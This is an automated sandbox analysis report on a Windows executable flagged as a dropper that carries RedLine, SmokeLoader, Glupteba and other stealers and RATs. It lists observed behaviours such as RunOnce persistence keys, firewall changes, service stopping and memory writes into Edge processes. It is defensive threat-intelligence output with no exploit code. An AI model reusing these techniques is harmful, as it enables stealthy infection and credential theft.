Malware Analysis Report

2024-12-08 01:13

Sample ID 231111-mdf88add6s
Target NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
SHA256 2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0

Threat Level: Known bad

The file NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan

Glupteba

Detect Mystic stealer payload

SectopRAT payload

Mystic

Glupteba payload

RedLine payload

SectopRAT

SmokeLoader

RedLine

ZGRat

Detect ZGRat V1

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 10:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 10:20

Reported

2023-11-11 10:23

Platform

win10v2004-20231023-en

Max time kernel

80s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\214C.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AD.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FA89.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 4524 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 180 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 180 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 180 wrote to memory of 3928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 180 wrote to memory of 3928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1936 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1936 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4444 wrote to memory of 4724 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4444 wrote to memory of 4724 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3848 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3848 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3156 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3156 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2468 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2468 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4000 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4000 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3988 wrote to memory of 3956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3988 wrote to memory of 3956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
